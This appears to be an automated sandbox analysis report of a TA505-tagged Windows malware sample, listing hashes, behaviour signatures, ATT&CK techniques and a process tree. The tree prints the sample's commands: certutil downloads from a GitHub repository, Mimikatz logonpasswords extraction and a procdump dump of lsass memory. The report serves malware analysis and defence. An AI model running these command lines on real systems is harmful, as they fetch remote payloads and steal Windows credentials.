ta505 | df9018383b6488d0c89bbf7063bd1143877ec6f99abf55b1c6846457baa7e080

Resubmissions

13-12-2023 16:00

231213-tfqc8sgdh6 10

13-12-2023 15:46

231213-s7452agch8 10

Analysis

max time kernel
140s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
13-12-2023 15:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe
Size

3.9MB
MD5

37130df0dc6057afaf677c2907eebdb4
SHA1

75caff36d1115049d605f91a651bf0f8479118cc
SHA256

08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c
SHA512

357185b2e36508485329a13792a9741ea5040db09b482e6ce10a67581f982883df79b0367a53bb8fcc2574fcdf2dddb97ced0303dfd72a1ee670182bf8001274
SSDEEP

49152:WYS35HobXrb/TavO90dL3BmAFd4A64nsfJoJLNXdCVpo/MFKQm8cjdFiMLz4zy4y:WYCobCJZ0S5Qmxvl4fEwe8xj/E

Score

10^/10

ta505

Malware Config

Signatures

TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
ta505
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1164	procdump.exe
4728	procdump64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1164	procdump.exe
1164	procdump.exe
1164	procdump.exe
1164	procdump.exe
4728	procdump64.exe
4728	procdump64.exe
4728	procdump64.exe
4728	procdump64.exe
4728	procdump64.exe
4728	procdump64.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1164	procdump.exe
Token: SeDebugPrivilege	4728	procdump64.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 3732 wrote to memory of 3352	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	87
PID 3732 wrote to memory of 3352	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	87
PID 3352 wrote to memory of 4548	3352	cmd.exe	88
PID 3352 wrote to memory of 4548	3352	cmd.exe	88
PID 3732 wrote to memory of 220	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	90
PID 3732 wrote to memory of 220	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	90
PID 220 wrote to memory of 4684	220	cmd.exe	91
PID 220 wrote to memory of 4684	220	cmd.exe	91
PID 3732 wrote to memory of 5080	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	92
PID 3732 wrote to memory of 5080	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	92
PID 5080 wrote to memory of 3088	5080	cmd.exe	93
PID 5080 wrote to memory of 3088	5080	cmd.exe	93
PID 3732 wrote to memory of 3140	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	95
PID 3732 wrote to memory of 3140	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	95
PID 3732 wrote to memory of 1816	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	104
PID 3732 wrote to memory of 1816	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	104
PID 1816 wrote to memory of 3812	1816	cmd.exe	105
PID 1816 wrote to memory of 3812	1816	cmd.exe	105
PID 3732 wrote to memory of 3984	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	108
PID 3732 wrote to memory of 3984	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	108
PID 3984 wrote to memory of 1164	3984	cmd.exe	109
PID 3984 wrote to memory of 1164	3984	cmd.exe	109
PID 3984 wrote to memory of 1164	3984	cmd.exe	109
PID 3732 wrote to memory of 2084	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	110
PID 3732 wrote to memory of 2084	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	110
PID 2084 wrote to memory of 1660	2084	cmd.exe	111
PID 2084 wrote to memory of 1660	2084	cmd.exe	111
PID 1164 wrote to memory of 4728	1164	procdump.exe	113
PID 1164 wrote to memory of 4728	1164	procdump.exe	113
PID 3732 wrote to memory of 3512	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	114
PID 3732 wrote to memory of 3512	3732	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	114

C:\Users\Admin\AppData\Local\Temp\08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe
"C:\Users\Admin\AppData\Local\Temp\08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3732
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3352
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b
    3⤵
    PID:4548
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -decode mim.b mim"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:220
- - C:\Windows\system32\certutil.exe
    certutil -decode mim.b mim
    3⤵
    PID:4684
- C:\Windows\system32\cmd.exe
  cmd /c "expand mim mimi.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5080
- - C:\Windows\system32\expand.exe
    expand mim mimi.exe
    3⤵
    PID:3088
- C:\Windows\system32\cmd.exe
  cmd /c "start mimi.exe" log privilege::debug sekurlsa::logonpasswords
  2⤵
  PID:3140
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1816
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe
    3⤵
    PID:3812
- C:\Windows\system32\cmd.exe
  cmd /c "start procdump.exe -accepteula -ma lsass.exe lsass.dmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3984
- - C:\Users\Admin\AppData\Local\Temp\procdump.exe
    procdump.exe -accepteula -ma lsass.exe lsass.dmp
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1164
  - - C:\Users\Admin\AppData\Local\Temp\procdump64.exe
      procdump.exe -accepteula -ma lsass.exe lsass.dmp
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4728
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk
    3⤵
    PID:1660
- C:\Windows\system32\cmd.exe
  cmd /c "start gg.lnk"
  2⤵
  PID:3512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\gg.lnk

Filesize
220KB

MD5
325189b06a4ea27cc3655ed2ae08e222

SHA1
ee390f1e9eea9355a2b956fc54a85d429386eb4b

SHA256
10c5c67e57ca1f2179dd1883be65c1287d48d3b31698be8f2458701c656fa734

SHA512
63922b78af57b2926c7630a4cd087d1a8177206794444685d39f5d879c6e70c226d8adec6a7595465a6d4bab70cf0f87b97fb0dd043f87b970161736fab3b793

Download Submit
C:\Users\Admin\AppData\Local\Temp\mim.b

Filesize
14B

MD5
3be7b8b182ccd96e48989b4e57311193

SHA1
78fb38f212fa49029aff24c669a39648d9b4e68b

SHA256
d5558cd419c8d46bdc958064cb97f963d1ea793866414c025906ec15033512ed

SHA512
f3781cbb4e9e190df38c3fe7fa80ba69bf6f9dbafb158e0426dd4604f2f1ba794450679005a38d0f9f1dad0696e2f22b8b086b2d7d08a0f99bb4fd3b0f7ed5d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\procdump.exe

Filesize
773KB

MD5
f2091c44d89789f689d98bc244358878

SHA1
db1ef4ce56820c93a3b7f1fdf36d3fffc7d1ec96

SHA256
e4ea34a7c2b51982a6c42c6367119f34bec9aeb9a60937836540035583a5b3bc

SHA512
95fea3d3e28ac1b67bc7d5996d9af81da31f867bc47c27a0b1a3bed42d2c5347e4746a2a83d435176c6b483a2e387a8fa5fec80bcf745ec5b250ac6d646dfae5

Download Submit
C:\Users\Admin\AppData\Local\Temp\procdump64.exe

Filesize
414KB

MD5
68a1f7c796de1d0df6b2d78e182df3a0

SHA1
43e3521e0403636150ac0c6c4da6a536f0ab504f

SHA256
5b165b01f9a1395cae79e0f85b7a1c10dc089340cf4e7be48813ac2f8686ed61

SHA512
616f2f165c8a32eca18a9f2ef14325c1d89c1ae97efd8c89eaa9adc9f527b940700a5c9ede93ae2218e0b58553a23effc6a4e48b8498eb83cfc723cbcf241d01

Download Submit